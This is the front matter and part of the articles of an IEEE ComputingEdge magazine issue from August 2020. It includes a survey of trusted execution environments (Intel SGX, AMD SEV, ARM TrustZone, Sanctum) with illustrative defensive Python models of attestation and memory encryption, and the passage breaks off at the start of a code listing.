Security and Privacy Automation Blockchain Digital Transformation AUGUST 2020 www.computer.org

Security and Privacy

Automation Blockchain Digital Transformation

AUGUST 2020 www.computer.org


STAFF

Editor: Cathy Martin

Publications Operations Project Specialist: Christine Anthony

Production & Design Artist: Carmen Flores-Garvey

Publications Portfolio Managers: Carrie Clark, Kimberly Sperka

Publisher: Robin Baldwin

Senior Advertising Coordinator: Debbie Sims

Circulation: ComputingEdge (ISSN 2469-7087) is published monthly by the IEEE Computer Society. IEEE Headquarters, Three Park Avenue, 17th Floor, New York, NY 10016-5997; IEEE Computer Society Publications Office, 10662 Los Vaqueros Circle, Los Alamitos, CA 90720; voice +1 714 821 8380; fax +1 714 821 4010; IEEE Computer Society Headquarters, 2001 L Street NW, Suite 700, Washington, DC 20036.Postmaster: Send address changes to ComputingEdge-IEEE Membership Processing Dept., 445 Hoes Lane, Piscataway, NJ 08855. Periodicals Postage Paid at New York, New York, and at additional mailing offices. Printed in USA.Editorial: Unless otherwise stated, bylined articles, as well as product and service descriptions, reflect the author’s or firm’s opinion. Inclusion in ComputingEdge does not necessarily constitute endorsement by the IEEE or the Computer Society. All submissions are subject to editing for style, clarity, and space.Reuse Rights and Reprint Permissions: Educational or personal use of this material is permitted without fee, provided such use: 1) is not made for profit; 2) includes this notice and a full citation to the original work on the first page of the copy; and 3) does not imply IEEE endorsement of any third-party products or services. Authors and their companies are permitted to post the accepted version of IEEE-copyrighted material on their own Web servers without permission, provided that the IEEE copyright notice and a full citation to the original work appear on the first screen of the posted copy. An accepted manuscript is a version which has been revised by the author to incorporate review suggestions, but not the published version with copy-editing, proofreading, and formatting added by IEEE. For more information, please go to: http://www.ieee.org/publications_standards/publications /rights/paperversionpolicy.html. 
Permission to reprint/republish this material for commercial, advertising, or promotional purposes or for creating new collective works for resale or redistribution must be obtained from IEEE by writing to the IEEE Intellectual Property Rights Office, 445 Hoes Lane, Piscataway, NJ 08854-4141 or [email protected]. Copyright © 2020 IEEE. All rights reserved.Abstracting and Library Use: Abstracting is permitted with credit to the source. Libraries are permitted to photocopy for private use of patrons, provided the per-copy fee indicated in the code at the bottom of the first page is paid through the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923.Unsubscribe: If you no longer wish to receive this ComputingEdge mailing, please email IEEE Computer Society Customer Service at [email protected] and type “unsubscribe ComputingEdge” in your subject line.IEEE prohibits discrimination, harassment, and bullying. For more information, visit www.ieee.org/web/aboutus/whatis/policies/p9-26.html.

IEEE COMPUTER SOCIETY computer.org

IEEE Computer Society Magazine Editors in Chief

Computer: Jeff Voas, NIST

Computing in Science & Engineering: Lorena A. Barba (Interim), George Washington University

IEEE Annals of the History of Computing: Gerardo Con Diaz, University of California, Davis

IEEE Computer Graphics and Applications: Torsten Möller, Universität Wien

IEEE Intelligent Systems: V.S. Subrahmanian, Dartmouth College

IEEE Internet Computing: George Pallis, University of Cyprus

IEEE Micro: Lizy Kurian John, University of Texas at Austin

IEEE MultiMedia: Shu-Ching Chen, Florida International University

IEEE Pervasive Computing: Marc Langheinrich, Università della Svizzera italiana

IEEE Security & Privacy: David Nicol, University of Illinois at Urbana-Champaign

IEEE Software: Ipek Ozkaya, Software Engineering Institute

IT Professional: Irena Bojanova, NIST

2469-7087/20 © 2020 IEEE Published by the IEEE Computer Society August 2020 1


AUGUST 2020 · VOLUME 6 · NUMBER 8

[Cover figures: (a) Intel SGX, (b) Sanctum, and (c) AMD SEV architectural views (the same diagram appears as Figure 1 in the Trusted Execution Environments article), and a change curve plotting morale and competence over time through the stages Shock (surprise or shock at the event), Denial (disbelief; looking for evidence that it isn't true), Frustration (recognition that things are different; sometimes angry), Depression (low mood; lacking in energy), Experiment (initial engagement with new situation), Decision (learning how to work in the new situation; feeling more positive), and Integration (changes integrated; a renewed individual).]

8 Trusted Execution Environments: Properties, Applications, and Challenges

36 Blockchain and Electronic Healthcare Records

48 To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile Transformation


Security and Privacy

8 Trusted Execution Environments: Properties, Applications, and Challenges
PATRICK JAUERNIG, AHMAD-REZA SADEGHI, AND EMMANUEL STAPF

14 FinalFilter: Asserting Security Properties of a Processor at Runtime
CYNTHIA STURTON, MATTHEW HICKS, SAMUEL T. KING, AND JONATHAN M. SMITH

Automation

22 Cyberattack-Resilient Cyberphysical Systems
BARRY M. HOROWITZ

30 EDI with Blockchain as an Enabler for Extreme Automation
JINAN FIAIDHI, SABAH MOHAMMED, AND SAMI MOHAMMED

Blockchain

36 Blockchain and Electronic Healthcare Records
NIR KSHETRI

42 Supply Chain Trust
NIR KSHETRI AND JEFFREY VOAS

Digital Transformation

48 To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile Transformation
JONATHAN SMART

54 Enterprise Architecture
RICARDO PEREZ-CASTILLO, FRANCISCO RUIZ, MARIO PIATTINI, AND CHRISTOF EBERT

Departments

4 Magazine Roundup

7 Editor’s Note: Hardware—The New Point of Attack

66 Conference Calendar

Subscribe to ComputingEdge for free at www.computer.org/computingedge.


4 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

Magazine Roundup

The IEEE Computer Society’s lineup of 12 peer-reviewed technical magazines covers cutting-edge topics ranging from software design and computer graphics to Internet computing and security, from scientific applications and machine intelligence to visualization and microchip design. Here are highlights from recent issues.

Physical Computing: A Key Element of Modern Computer Science Education

A recent growth area in computer science education is physical computing, which involves combining software and hardware to build interactive physical systems that sense and respond to the real world. This article from the April 2020 issue of Computer provides an overview of physical computing and its value in the classroom, using the BBC micro:bit as an example.

An Interactive Exploration Tool for High-Dimensional Datasets: A Shock Physics Case Study

Validating simulations with experimental results is a vital component of modern materials science. Existing workflows require substantial human intervention to interpret their results. The authors of this article from the March/April 2020 issue of Computing in Science & Engineering present a statistical approach to identifying physically meaningful features. The authors construct a visualization system that allows users to interactively and intuitively explore their datasets.

The Font Wars, Part 2

In the early 1980s, letters rasterized from outline fonts at low and medium resolutions had irregular shapes. The lower the resolutions, the greater the irregularities, and the more that typographers criticized the type quality. PostScript fonts, launched in 1985, regularized medium-resolution type with secret ingredients coyly called “hints” by Adobe. This prompted competing inventions of font regularization using techniques variously called “instructions,” “delta exceptions,” “procedures,” “intelligence,” and other terms sounding more like high-tech snake oil than science. Further research and open publication, however, revealed their connections to traditional aesthetics of letter symmetry as well as to modern signal processing, pattern recognition, and psychophysics, thus expanding our understanding of typography in digital culture. Read more in this article from the January–March 2020 issue of IEEE Annals of the History of Computing.

Nano for the Public: An Exploranation Perspective

Public understanding of contemporary scientific issues is critical for the future of society. Public spaces, such as science centers, can affect the communication of science by providing active knowledge-building experiences of scientific phenomena. Contributing to this vision, the authors of this article from the March/April 2020 issue of IEEE Computer Graphics and Applications previously developed an interactive visualization as part of a public exhibition about nano. The authors reflect on how the immersive design and features of the exhibit contribute as a tool for science communication in light of the emerging paradigm of exploranation, and offer some forward-looking perspectives about what this notion has to offer the domain.


www.computer.org/computingedge 5

Decision Making in IoT Environment through Unsupervised Learning

Nowadays, unsupervised learning can identify hidden patterns and classes inside the huge amount of data coming from the Internet of Things (IoT). Analyzing IoT data through machine-learning techniques requires the use of mathematical algorithms, computational techniques, and an accurate tuning of the input parameters. In this article from the January/February 2020 issue of IEEE Intelligent Systems, the authors present a study of unsupervised-learning techniques applied on IoT data to support decision-making processes inside intelligent environments. To assess the proposed approach, they discuss two case studies in which behavioral IoT data has been collected, in a noninvasive way, to achieve an unsupervised classification that can be adopted during a decision-making process.

Network Quality-Aware Architecture for Adaptive Video Streaming From Drones

Video streaming over the IP networks presents several challenges for remote drone piloting. To achieve a high Quality of Experience, minimal latency is mandatory. However, wireless links usually impose dynamic changes to the Quality of Service conditions. Moreover, bandwidth limitations can increase both the final perceived latency and packet loss during video streaming. These circumstances require an architecture capable of estimating network performance and applying corrective actions in a timely manner to optimize application-level quality. In this article from the January/February 2020 issue of IEEE Internet Computing, the authors present such an architecture and discuss the results of its application in video streaming for remote drone piloting. Their proposal offers a framework with low coupling between its functional blocks and high adaptability to dynamic scenarios. Accordingly, they aim to pave the way for reactive applications that leverage edge-computing elements and adapt to network conditions.

MLPerf: An Industry Standard Benchmark Suite for Machine Learning Performance

In this article from the March/April 2020 issue of IEEE Micro, the authors describe the design choices behind MLPerf, a machine-learning performance benchmark that has become an industry standard. The first two rounds of the MLPerf Training benchmark helped drive improvements to software-stack performance and scalability, showing a 1.3× speedup in the top 16-chip results despite higher quality targets and a 5.5× increase in system scale. The first round of MLPerf Inference received over 500 benchmark results from 14 different organizations, showing growing adoption.

Do I Smell Coffee? The Tale of a 360° Mulsemedia Experience

One of the main challenges in current multimedia networking environments is to find solutions to help accommodate the next generation of mobile application classes with stringent Quality of Service (QoS) requirements while enabling the Quality of Experience (QoE) provisioning for users. One such application class is 360° mulsemedia—multiple sensorial media—which enriches 360° video by adding sensory effects that stimulate human senses beyond those of sight and hearing, such as the tactile and olfactory ones. In this article from the January–March 2020 issue of IEEE MultiMedia, the authors present a conceptual framework for 360° mulsemedia delivery and a 360° mulsemedia-based prototype that enables users to experience 360° mulsemedia content. User evaluations revealed that higher video resolutions do not necessarily lead to the highest QoE levels. Therefore, bandwidth savings can be leveraged with no detrimental impact on QoE.

Child-Robot Theater: Engaging Elementary Students in Informal STEAM Education Using Robots

One of the options to make science, technology, engineering, and mathematics (STEM) more accessible, especially for children, is to integrate STEM content into more attractive materials and familiar formats. The authors of this article from the January–March 2020 issue of IEEE Pervasive Computing created an afterschool program called “Child-Robot Theater” for children in a rural elementary school. They administered two programs over two years. Thirty-seven children participated in the two-phase program, from which 23 children were included in the analysis of this study. The authors infused science, robotics, and computer science with acting, dancing, singing, and drawing inspired by the theater production. In the article, after briefly introducing their pedagogical framework and procedure, the authors delineate potential impacts, lessons, and recommendations for future works.

You Could Be Mine(d): The Rise of Cryptojacking

Traditional malicious attacks have evolved beyond file-based methods, with malicious files now existing as processes and services to evade detection. This article from the March/April 2020 issue of IEEE Security & Privacy examines the rise of cryptojacking—the use of another’s machine for profit through cryptocurrency mining—and how we’re all at risk.

Contrasting Big Bang With Continuous Integration Through Defect Reports

Continuous integration promises earlier defect detection, quality improvements, and more customer value delivered faster. In this case study from the May/June 2020 issue of IEEE Software, the authors examine development of software for the advanced safety and driver support component of a Swedish vehicle manufacturer in two consecutive projects.

Attacking Key Management in Ransomware

Ransomware has observed a steady growth over the years with several concerning trends that indicate efficient, targeted attacks against organizations and individuals alike. These opportunistic attackers indiscriminately target both public- and private-sector entities to maximize gain. In this article from the March/April 2020 issue of IT Professional, the authors highlight the criticality of key management in ransomware’s cryptosystem to facilitate building effective solutions against this threat. They introduce the ransomware kill chain to elucidate the path that adversaries must take to attain their malicious objective. The authors examine current solutions presented against ransomware in light of this kill chain and specify which constraints on ransomware are being violated by the existing solutions. Finally, they present the notion of memory attacks against ransomware’s key management and present initial experiments with dynamically extracting decryption keys from real-world ransomware. Results of the preliminary research are promising, and the extracted keys were successfully deployed in subsequent data decryption.



2469-7087/20 © 2020 IEEE Published by the IEEE Computer Society August 2020 7

Editor’s Note

Hardware—The New Point of Attack

Cybercriminals increasingly exploit computer hardware vulnerabilities, highlighting the need for secure architectures and hardware-based defenses. Cache timing, Rowhammer, BIOS, and other types of cyberattacks on hardware and firmware are threatening information security in new ways. This issue of ComputingEdge discusses innovative techniques for combatting these attacks at the hardware level.

One promising approach is trusted execution environments (TEEs). IEEE Security & Privacy’s “Trusted Execution Environments: Properties, Applications, and Challenges” provides an overview of existing TEEs and calls for improvements in TEE architecture design. Meanwhile—given the absence of provably secure microprocessors—the authors of IEEE Micro’s “FinalFilter: Asserting Security Properties of a Processor at Runtime” recommend using a dynamic, reconfigurable verification tool to catch security violations not found using static verification methods.

Security is of paramount importance in today’s automated systems. The author of IEEE Security & Privacy’s “Cyberattack-Resilient Cyberphysical Systems” describes his team’s security approach for automated systems in cars, drones, and 3D printers. In IT Professional’s “EDI with Blockchain as an Enabler for Extreme Automation,” the authors argue that blockchain technology can make electronic data interchange (EDI) systems—which automate healthcare supply-chain management—more secure.

Blockchain technology can enable data security in various industries. Computer’s “Blockchain and Electronic Healthcare Records” gives another example of blockchain in healthcare, explaining that the technology can help secure patient data. IT Professional’s “Supply Chain Trust” shows how blockchain can help strengthen supply chains, which are increasingly subject to cyberattacks.

Finally, this ComputingEdge issue features two articles from IEEE Software that examine digital transformation. In “To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile Transformation,” the author shares advice for digitally transforming large, established organizations: articulate reasons for change, focus on outcomes, prioritize technical excellence, and more. “Enterprise Architecture” presents insights about a digital transformation process that allows companies to assess their IT systems and identify needed changes.


8 August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

EDITORS: Mohamed Kaâniche, [email protected]; Richard Kuhn, [email protected]

DEPARTMENT: RESILIENT SECURITY

Trusted Execution Environments: Properties, Applications, and Challenges

Patrick Jauernig, Ahmad-Reza Sadeghi, Emmanuel Stapf, TU Darmstadt

Software attacks on modern computer systems have been a persisting challenge for several decades, leading to a continuous arms race between attacks and defenses. As a first line of defense, operating system kernels enforce process isolation to limit potential attacks to only the code containing the vulnerabilities. However, vulnerabilities in the kernel itself (for example, various vulnerabilities found by Google Project Zero), side-channel attacks [1], or even physical attacks [2] can be used to undermine process isolation.

To provide strong isolation between untrusted software components, including the operating system itself, a number of hardware-assisted security solutions have been proposed that aim to significantly increase the protection level that defenses against software exploitation have failed to provide. Prominent examples are trusted platform modules (TPMs), hardware security modules (HSMs), secure elements (SEs), and trusted execution environments (TEEs).

TPMs are dedicated, secure cryptoprocessors tied to the individual device, offering services like key generation, encryption, or authenticated integrity measurements called attestation. Yet, they do not offer isolation for sensitive applications. In contrast, HSMs also allow the running of sensitive code and are not bound to a device because they are typically implemented as plug-in cards (like peripheral component interconnect cards) or attachable external devices. SEs instead implement the HSM functionality as a coprocessor directly on the board, which offers only low performance due to size and energy constraints. Moreover, third-party development on SEs is heavily restricted by manufacturers. An alternative to these solutions is TEEs, which are commonly integrated tightly into the system on chip (SoC) and leverage existing SoC resources, enabling them to provide cryptographic primitives and isolated execution with much higher flexibility than that provided by any other solution. Thus, industry is pushing TEEs on all fronts, from cloud servers and desktop computers over smartphones to low-energy embedded devices.

However, after years of hardware security research, we can conclude that existing solutions are still insufficient: Deployed hardware solutions like TPMs or TEEs are not used widely or have been attacked through various side-channels or through recently emerging cross-layer attacks that exploit hardware vulnerabilities from software, as demonstrated by attacks like CLKScrew or Foreshadow. The Hack@DAC hardware security contest [3] revealed a systematic protection gap in current chip designs: Existing verification approaches may fail to detect certain classes of vulnerabilities in the Register Transfer Level (RTL) of hardware description code.

A promising recent approach is to manage hardware via a small software trusted computing base (TCB) to create strongly isolated unprivileged TEEs (e.g., by building user-space enclaves for mobile devices based on ARM TrustZone [4]), or to leverage a completely open source design (for example, for the RISC-V platform [5]).

In this article, we review selected existing industrial and promising academic TEE solutions and briefly discuss the impact of deployed solutions, their strengths and shortcomings, and new research directions. The results of this survey are summarized in Table 1.

This article originally appeared in IEEE Security & Privacy, vol. 18, no. 2, 2020. Digital Object Identifier 10.1109/MSEC.2019.2947124. Date of current version: 19 March 2020.


TEES PROPOSED BY INDUSTRY

The high demand for hardware-assisted security architectures led to the development of TEE architectures across many platforms. In this section, we present a subset of these TEE architectures of major processor brands, namely, Intel, AMD, and ARM.

Intel SGX: Protecting Apps in User Space

Intel introduced Software Guard Extensions (SGX) [6] with their Skylake microarchitecture in 2015. From the adversary model perspective, any software, including the OS (and even some hardware components), may be considered untrusted. Hence, SGX’s TCB only comprises the CPU hardware and its microcode.

In SGX, instances of a TEE, called enclaves [as shown in Figure 1(a)], are used to execute sensitive program code in user space, isolated from a potentially malicious OS or hypervisor. Each enclave is bundled with a regular nonsensitive application (App) that invokes the enclave as a child process. During the enclave setup, the integrity of the enclave code is verified (attested); i.e., an authenticated measurement, typically a binary hash, of the code loaded into the enclave is reported either locally or remotely. When an enclave is executed, it shares its virtual address space with its host process. The enclave memory management is entirely performed by the untrusted OS. Moreover, the OS provides exception handling and input–output services to the enclave. Hardware features protect the enclave code and data (e.g., its page tables) from unauthorized access by the host process, the OS, or even the hypervisor.

TABLE 1. A comparison of presented TEE architectures.

|                               | Intel SGX                  | AMD SEV                     | ARM TrustZone                        | Sanctum                           | Sanctuary                            |
|-------------------------------|----------------------------|-----------------------------|--------------------------------------|-----------------------------------|--------------------------------------|
| Commercial/academic           | Commercial                 | Commercial                  | Commercial                           | Academic                          | Academic                             |
| Target devices                | Client PCs                 | Servers                     | Mobile devices                       | Undefined                         | Mobile devices                       |
| Trust anchor                  | CPU hardware and microcode | Platform security processor | TZ hardware and ARM trusted firmware | CPU hardware and security monitor | TZ hardware and ARM trusted firmware |
| Cache side-channel protection | No                         | No                          | No                                   | Yes                               | Yes (for Sanctuary instances)        |
| Multiple security domains     | Yes                        | Yes                         | No                                   | Yes                               | Yes                                  |
| Secure peripherals            | No                         | No                          | Yes                                  | No                                | Yes                                  |

[Figure 1 (diagram): (a) Intel SGX: App, Enclave A and Enclave B above the Operating System in software; CPU with SGX microcode in hardware; a Memory Encryption Engine in front of memory regions A and B. (b) Sanctum: App, Enclave A and Enclave B above the Operating System, a Security Monitor (SM) beneath it in software; CPU with the Sanctum PTW in hardware; memory regions A and B. (c) AMD SEV: VM A and VM B, each with its own Operating System and Apps, above a Hypervisor in software; CPU with a Secure Processor in hardware; memory regions A and B.]

FIGURE 1. High-level architectural views of (a) Intel SGX, (b) Sanctum, and (c) AMD SEV. PTW: page table walker; VM: virtual machine.

SGX is implemented inside the CPU through microcode and minimal hardware changes that are made at the page table walker (PTW). All enclave code or data leaving the CPU is encrypted, using a new hardware component called the Memory Encryption Engine (MEE) that allows SGX to protect enclaves from direct memory access (DMA) attacks from malicious peripherals. The MEE is also used to persistently store the enclave states after their execution.

In the first and only commercially available version of SGX, software cache side-channel attacks are not considered in the adversary model. However, a broad spectrum of recent attacks showed that side-channel attacks are a much more crucial threat for SGX than expected [1], [7].
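The measurement-and-report flow that the text describes for SGX enclaves, as an added example written for this survey rather than code from the article or from Intel: the hardware hashes every page loaded into the enclave, binds that measurement and a verifier-chosen nonce into a report under a key only the hardware holds, and the relying party checks the MAC, the measurement and the nonce. TrustedHardware, Report, PAGE_SIZE and the sample pages are this example's own assumptions, not SGX structures.

```python
"""Simplified model of enclave measurement and attestation. It is not
Intel's implementation: TrustedHardware stands in for CPU plus microcode,
Report for the hardware-produced report, and the pages are constructed."""
import hashlib
import hmac
import os
from dataclasses import dataclass

PAGE_SIZE = 4096  # model constant: enclave code is measured page by page


@dataclass(frozen=True)
class Report:
    measurement: bytes  # hash chain over every page loaded into the enclave
    report_data: bytes  # caller-chosen value bound into the report (a nonce here)
    mac: bytes          # keyed MAC that only the hardware can produce


class TrustedHardware:
    """Only holder of the report key, so untrusted software (OS, hypervisor,
    host app) cannot forge a report for code the hardware never loaded."""

    def __init__(self, report_key: bytes):
        self._report_key = report_key  # never leaves the "hardware"

    def measure(self, pages) -> bytes:
        """Extend a hash chain with each page in load order, so changing,
        reordering or omitting a page changes the measurement."""
        h = hashlib.sha256()
        for index, page in enumerate(pages):
            if len(page) != PAGE_SIZE:
                raise ValueError("enclave pages must be exactly PAGE_SIZE bytes")
            h.update(b"ADD_PAGE" + index.to_bytes(4, "little") + page)
        return h.digest()

    def create_report(self, pages, report_data: bytes) -> Report:
        measurement = self.measure(pages)
        mac = hmac.new(self._report_key, measurement + report_data, "sha256").digest()
        return Report(measurement, report_data, mac)

    def verify_report(self, report: Report) -> bool:
        expected = hmac.new(self._report_key,
                            report.measurement + report.report_data, "sha256").digest()
        return hmac.compare_digest(expected, report.mac)


def verifier_accepts(hw: TrustedHardware, report: Report,
                     expected_measurement: bytes, nonce: bytes) -> bool:
    """What a relying party checks: the report is genuine (hardware MAC),
    the measurement is the code it expects, and the nonce is fresh."""
    return (hw.verify_report(report)
            and hmac.compare_digest(report.measurement, expected_measurement)
            and hmac.compare_digest(report.report_data, nonce))


def demo() -> dict:
    """Run the flow on constructed sample pages and return four outcomes."""
    hw = TrustedHardware(os.urandom(32))
    enclave_code = [bytes([0x90]) * PAGE_SIZE, bytes([0xC3]) * PAGE_SIZE]  # constructed
    expected = hw.measure(enclave_code)  # value the enclave author publishes
    nonce = os.urandom(16)               # chosen by the verifier per request

    genuine = hw.create_report(enclave_code, nonce)
    # One page modified before load: hardware reports a different measurement.
    tampered = hw.create_report([enclave_code[0], bytes([0xCC]) * PAGE_SIZE], nonce)
    # Untrusted OS builds a report with a key of its own: MAC check fails.
    forged_mac = hmac.new(b"os-chosen-key", expected + nonce, "sha256").digest()
    forged = Report(expected, nonce, forged_mac)
    # A genuine but old report presented against a fresh nonce: rejected.
    return {
        "genuine": verifier_accepts(hw, genuine, expected, nonce),
        "tampered": verifier_accepts(hw, tampered, expected, nonce),
        "forged": verifier_accepts(hw, forged, expected, nonce),
        "replayed": verifier_accepts(hw, genuine, expected, os.urandom(16)),
    }
```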

AMD SEV: Moving to the Cloud

In 2017, AMD introduced its own TEE, Secure Encrypted Virtualization (SEV) [8] [shown in Figure 1(c)], which follows an entirely different approach than Intel SGX. Whereas SGX focuses on micro services (e.g., DRM, or cryptographic functionality), AMD designed a TEE for the cloud: It offers better performance for intensive workloads and is transparent to the software running in an SEV-enabled virtual machine (VM) [8]. Thus, its adversary model is also centered around the cloud (i.e., after setting up a VM, its memory is isolated even from the hypervisor).

To isolate a VM, Secure Encrypted Virtualization (SEV) encrypts each VM transparently with an individually generated encryption key. Access to these keys is limited to hardware; thus, the hypervisor or any other software component outside the VM cannot interfere with the encryption. Whereas SGX enclaves’ isolation is enforced by the memory management unit, SEV leverages Secure Memory Encryption (SME) to encrypt VM memory to protect against physical adversaries and to protect against privileged software or other VMs. SME is a transparent hardware memory encryption feature that encrypts data before storing it in memory and decrypts the data before loading it to the cache. SME stores encryption keys in a dedicated platform security processor based on the ARM architecture, and only allows operations on memory that has the matching tag to a key. This tag is automatically assigned to all memory that belongs to a VM (using the VM ASID identifier); thus, external accesses (for example, by the hypervisor) will see only encrypted data. A bit flag set indicates that a page should be encrypted; hence, VMs can also have unencrypted pages for shared memory.
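The ASID-tagged, per-VM encryption with a per-page encrypt flag just described, modelled as an added example (not AMD's implementation or code from the article): a security processor holds one key per ASID and never hands it out, the memory path encrypts on store and decrypts on load with the accessing ASID's key when the page's encrypt bit is set, and the hypervisor, which owns no VM key, sees only ciphertext on such pages while pages with the bit clear stay readable. SecurityProcessor, MemoryController, HV_ASID and the HMAC-SHA256 keystream standing in for the hardware cipher are this example's assumptions.

```python
"""Model of SEV-style memory encryption keyed by VM ASID. Constructed for
illustration: an HMAC-based keystream replaces the real memory cipher, and
the class names are this example's own, not AMD's."""
import hmac
import os

HV_ASID = 0   # the hypervisor runs without any VM key
BLOCK = 32    # bytes of keystream produced per HMAC call


class SecurityProcessor:
    """Holds one memory encryption key per launched VM, indexed by ASID.
    Deliberately has no method that returns a key: only the memory path can
    request keystream, and only for an ASID that has been launched."""

    def __init__(self):
        self._keys = {}

    def launch_vm(self, asid: int) -> None:
        if asid == HV_ASID or asid in self._keys:
            raise ValueError("ASID reserved or already in use")
        self._keys[asid] = os.urandom(32)  # individually generated per VM

    def keystream(self, asid: int, page: int, length: int) -> bytes:
        key = self._keys[asid]  # KeyError: this ASID owns no key
        out = b""
        for counter in range((length + BLOCK - 1) // BLOCK):
            tweak = page.to_bytes(8, "little") + counter.to_bytes(4, "little")
            out += hmac.new(key, tweak, "sha256").digest()
        return out[:length]


class MemoryController:
    """Encrypts on store and decrypts on load with the key of the
    *accessing* ASID when the page's encrypt bit is set; pages with the bit
    clear bypass encryption so a VM can share them with the hypervisor."""

    def __init__(self, psp: SecurityProcessor):
        self._psp = psp
        self._pages = {}  # page number -> (bytes as held in DRAM, encrypt bit)

    def _transform(self, asid: int, page: int, data: bytes) -> bytes:
        ks = self._psp.keystream(asid, page, len(data))
        return bytes(a ^ b for a, b in zip(data, ks))

    def store(self, asid: int, page: int, data: bytes, c_bit: bool) -> None:
        in_dram = self._transform(asid, page, data) if c_bit else data
        self._pages[page] = (in_dram, c_bit)

    def load(self, asid: int, page: int) -> bytes:
        in_dram, c_bit = self._pages[page]
        if not c_bit or asid == HV_ASID:
            return in_dram  # no VM key applied: hypervisor sees ciphertext
        return self._transform(asid, page, in_dram)


def demo() -> dict:
    """Two VMs on one platform; VM A writes a private and a shared page."""
    psp = SecurityProcessor()
    mem = MemoryController(psp)
    psp.launch_vm(1)
    psp.launch_vm(2)
    secret = b"VM A private page contents (constructed sample)"
    shared = b"VM A shared buffer for hypervisor I/O (constructed)"
    mem.store(1, page=0x10, data=secret, c_bit=True)
    mem.store(1, page=0x11, data=shared, c_bit=False)
    return {
        "owner_private": mem.load(1, 0x10),        # VM A: plaintext
        "hypervisor_private": mem.load(HV_ASID, 0x10),  # ciphertext only
        "other_vm_private": mem.load(2, 0x10),     # wrong key: garbage
        "hypervisor_shared": mem.load(HV_ASID, 0x11),   # readable
    }
```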

Later, SEV-ES (Encrypted State) was introduced to add protection for CPU register contents, which prevents information leakage to the hypervisor when a VM is suspended. As in SGX, cache side-channels are not considered in the adversary model of AMD SEV. Recently, security researchers from Google found a vulnerability in SEV’s elliptic-curve implementation, allowing them to recover the private key that is used to derive individual VM keys, effectively breaking the encryption. This issue has been fixed by a firmware update [9].

ARM TrustZone: Protecting Mobile Devices

Protection of sensitive program code on mobile devices is also of vital importance and will be even more vital due to emerging use cases like mobile ID or the digital car key. Since 2004, ARM TrustZone [10] has provided the hardware primitives to implement TEE security architectures on mobile devices. In Figure 2(a), the typical design of a security architecture that uses TrustZone is shown.

TrustZone assumes a strong software attacker able to compromise the untrusted commodity operating system running regular apps; physical attackers are out of scope. TrustZone separates the system into two worlds: the normal world, containing the untrusted commodity OS and all nonsensitive applications, and the so-called secure world. The secure world comprises the sensitive applications [Trusted Apps (TAs)] and the Trusted OS (TOS). TAs can come either standalone or bundled with a nonsensitive application running in the normal world, whereas the TOS provides the usual process isolation and system services to the TAs. The secure world represents the single TEE of the system, unlike Intel SGX or AMD SEV, which both provide multiple separate TEE instances. By including device drivers in the TOS, TrustZone can establish secure communication channels from peripherals (e.g., fingerprint sensors) to sensitive applications. TrustZone even allows secure DMA by temporarily assigning memory regions exclusively to one or more SoC components (for example, the CPU, GPU, or LCD controller).

TrustZone's core idea, the world switch, is implemented in the most privileged software component, the Trusted Firmware (TF), which also handles the communication between the two worlds. Together with all code running in the secure world, the TF represents the software TCB of the system. The separation between the normal and the secure world is enforced in hardware by a set of security extensions to the CPU, the system bus, and additional components on the SoC such as the memory controller: every bus transaction carries a non-secure (NS) attribute, and resources assigned to the secure world reject transactions marked non-secure.

TrustZone does not provide cache partitioning and, therefore, cannot protect against cache side-channel attacks in general. Yet the main weakness of classic TrustZone-based security architectures is their single-TEE nature: all TAs share one secure world, so a trust relationship has to be established between the device vendor and every developer whose code is admitted there. Establishing this trust generates high costs for security assessments and management overhead, which restrains the development of new secure mobile services.

TEES PROPOSED BY ACADEMIA

Limitations of existing TEEs motivated academic researchers to propose their own hardware-assisted security architectures. In this section, we present Sanctum and Sanctuary which, on an abstract level, aim to improve on Intel SGX and ARM TrustZone, respectively.

SANCTUM: EXTENDING ENCLAVE PROTECTION

The Sanctum security architecture was proposed in 2016 by Costan et al.5 for the open RISC-V architecture [shown in Figure 1(b)]. Sanctum resembles Intel SGX in its adversary model and in its high-level concept of user-space enclaves (or TEE instances), but additionally provides resilience against cache side-channel attacks. As in SGX, a Sanctum enclave comes bundled with a nonsensitive host application that invokes the enclave. The untrusted OS still provides exception handling and input-output services to the enclaves. However, in Sanctum, each enclave manages its own page tables.

In contrast to SGX, the enclave setup and other security-critical functions are not implemented in microcode but in a software component called the Security Monitor (SM), which represents the software TCB of the system. The SM runs at the most privileged software level of a RISC-V processor, known as machine mode, and measures each enclave so that its integrity can be verified locally or remotely before the enclave is executed. Sanctum enforces the isolation of enclave code and data by introducing small hardware changes at the page table walker (PTW) of the CPU. These changes guarantee, on the one hand, that the OS cannot access enclave memory and, on the other hand, that an enclave cannot access OS memory by changing its own page tables: the circuitry added around the PTW refuses any address translation whose resulting physical address lies outside the memory that the current execution context is allowed to access. Protection from cache side-channel attacks is achieved with cache partitioning, implemented through memory page coloring. Because the physical page frame number determines which sets of the last-level cache (shared between cores) a page can occupy, assigning a set of page colors exclusively to an enclave also assigns it the corresponding cache lines exclusively.

[Figure 2: two block diagrams. (a) ARM TrustZone: the CPU cores run the normal world (App, Operating System) and the secure world (TA, Trusted OS) on top of the Trusted Firmware; the bus and memory controller splits memory into normal and secure regions. (b) Sanctuary: a single core is temporarily isolated to run a sensitive app on top of the Sanctuary Library, while the remaining cores run the normal world and the secure world's security primitives.]

FIGURE 2. High-level architectural views. (a) The ARM TrustZone and (b) the Sanctuary.

In contrast to SGX, Sanctum does not encrypt enclave code and data in main memory, so an attacker with physical access to DRAM is not stopped by it. However, Sanctum provides basic DMA attack protection through small changes to the memory controller that allow the SM to restrict DMA to a designated region of memory.
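The following Python model, added here as an illustration and not part of Sanctum or of this article, puts the two mechanisms just described together: a Security Monitor that hands page colors (and with them DRAM pages and LLC sets) exclusively to enclaves, a page-table walk whose result is checked against the current execution context, and a check that the LLC sets reachable by an enclave and by the OS are disjoint. The page size, cache geometry, context names and mappings are constructed assumptions.

```python
"""Software model of two Sanctum mechanisms: the check the added circuitry
around the page table walker (PTW) applies to every translation result, and
last-level-cache (LLC) partitioning by page coloring. Added illustration, not
Sanctum's code; page size, cache geometry and the color assignment are
assumptions made for this example."""
from __future__ import annotations

PAGE_SHIFT = 12                          # 4 KiB pages (assumption)
PAGE_MASK = (1 << PAGE_SHIFT) - 1
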